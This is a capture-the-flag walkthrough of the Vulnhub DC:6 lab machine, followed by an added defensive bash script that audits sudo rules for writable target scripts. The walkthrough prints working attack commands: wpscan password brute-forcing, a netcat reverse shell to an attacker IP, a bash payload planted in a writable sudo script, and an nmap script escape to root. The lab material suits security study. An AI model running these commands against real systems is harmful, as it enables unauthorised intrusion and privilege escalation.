Overall Summary
DC: 6 is a Vulnhub machine that can be found at https://www.vulnhub.com/entry/dc-6,315/. The exploitation process consists of discovering a WordPress site, enumerating it to obtain usernames, and using those usernames to brute-force a password. A low-privilege shell is obtained by exploiting a vulnerability in the Plainview Activity Monitor plugin to get RCE via code injection. To get root privileges we simply check what we are allowed to execute with sudo as two different users.
Scanning and Enumeration
Starting out with a full TCP scan with nmap reveals two open ports: one is an SSH service and the other is an HTTP service.
If we try to browse to the HTTP server, it takes a few seconds before we get a “server not found” error, and if we look at the URL it seems we are being redirected to a hostname instead of an IP address; the hostname is wordy.
Since the HTTP service redirects to a hostname, I’ll add the hostname and the IP address to my hosts file in /etc/hosts with a text editor.
After saving the changes, if we go back to the browser and navigate to http://wordy we can now see what seems to be a WordPress site.
Browsing to the wp-login.php file displays a WordPress login page.
Now that I have a login page and know that WordPress is running on this web server, I will use wpscan to see if I can enumerate some information. This is the command I used to run wpscan (the -e switch is used to enumerate):
wpscan --url http://wordy/ -e
I also browsed the other directories that were found by gobuster to see if there were any credentials, specifically passwords since I already had some usernames, but I couldn’t find anything else there. I then thought that brute-forcing the passwords would be a good idea, but using a wordlist like rockyou.txt would take too much time, especially when dealing with 4 usernames. Luckily the author of this machine provided a smaller list of passwords by taking the rockyou.txt file and using only a part of the list. This is the command used to get a shorter password list:
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
I also created a file called usernames containing the usernames I found (sarah, mark, jens) and used wpscan again to brute-force the password. This is the command I used:
wpscan --url http://wordy -U /home/someuser/usernames -P /home/someuser/passwords.txt
In about 5 minutes it determined mark’s password; mark was also the only user for whom a password could be brute-forced.
When logged in with those credentials, I was able to find out the roles of each user and the WordPress version running, as highlighted at the bottom.
Looking around for exploits, I couldn’t find anything relevant for the WordPress version running, so I kept looking and noticed an “Activity Monitor” option on the left side below the Tools option, which I thought would probably be worth checking.
Exploitation
While looking for vulnerabilities in Plainview Activity Monitor version 20161228, I came across the following POC:
From here, using Burp seemed like a good option, so I set up Burp to intercept my request when entering an IP address and clicking on Lookup. This is how the request looks in Burp:
Looking at the response from the server and scrolling down almost to the end, I was able to successfully prove command execution.
To get a reverse shell I used netcat, which happened to be available on the target machine, to connect back to my attacking machine on port 443. This is the command I used to get a reverse shell:
nc -e /bin/sh 192.168.80.129 443
I was able to successfully get a reverse shell as the www-data user.
Since the SSH service was open, I tried to SSH as the graham user and was able to successfully log in.
Post-Exploitation
Elevating privileges was very straightforward, as issuing the command “sudo -l” shows that the user can run a backups.sh file via sudo as the user “jens”.
Navigating to the location of the file, I noticed that the user graham can modify it because it belongs to the devs group.
#!/bin/bash
/bin/bash -i
TF=$(mktemp)
echo 'os.execute("/bin/bash")' > $TF
sudo nmap --script=$TF
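As an added, defender-side check (example code of mine, not from the write-up or the DC-6 author): a bash audit that reads sudoers-style rules and flags every rule whose target script is group- or world-writable, or missing, which is the backups.sh misconfiguration that graham could abuse above. The rule format, user names and file paths in the fixture are constructed; it assumes a Unix ls -ld that prints the ten-character permission string first.

```shell
#!/usr/bin/env bash
# Added audit helper, not part of the DC-6 write-up: read sudoers-style rules
# and flag any rule whose target script is group- or world-writable (the
# backups.sh misconfiguration above) or does not exist at all. Rule format,
# users and paths are constructed for the demo:
#   <user> ALL=(<runas>) NOPASSWD: <absolute path>

audit_sudo_targets() {
    local rules_file="$1" user spec tag path runas perm
    while read -r user spec tag path; do
        # skip blank lines and comments
        [ -z "$user" ] && continue
        case "$user" in \#*) continue ;; esac
        runas=${spec#*\(}; runas=${runas%\)}     # "ALL=(jens)" -> "jens"
        if [ ! -e "$path" ]; then
            echo "$user $runas $path missing"    # dangling rule: path could be created
            continue
        fi
        perm=$(ls -ld -- "$path" | cut -c1-10)   # e.g. -rw-rw-r--
        case "$perm" in
            ?????w????|????????w?)               # group write or other write bit set
                echo "$user $runas $path writable($perm)" ;;
        esac
    done < "$rules_file"
}

# Constructed fixture mirroring the write-up: a group-writable backups.sh
# beside a correctly permissioned script and a dangling rule.
demo_audit() {
    local tmp
    tmp=$(mktemp -d)
    printf '#!/bin/bash\ntar czf /tmp/backups.tgz /var/www\n' > "$tmp/backups.sh"
    chmod 664 "$tmp/backups.sh"    # the devs group can edit it: bad
    printf '#!/bin/bash\necho ok\n' > "$tmp/safe.sh"
    chmod 755 "$tmp/safe.sh"       # only the owner can write: fine
    cat > "$tmp/rules" <<EOF
# constructed sudoers-style rules
graham ALL=(jens) NOPASSWD: $tmp/backups.sh
jens ALL=(root) NOPASSWD: $tmp/safe.sh
jens ALL=(root) NOPASSWD: $tmp/gone.sh
EOF
    audit_sudo_targets "$tmp/rules"
    rm -rf "$tmp"
}

demo_audit
```

Only backups.sh (writable) and gone.sh (missing) are reported; safe.sh produces no finding.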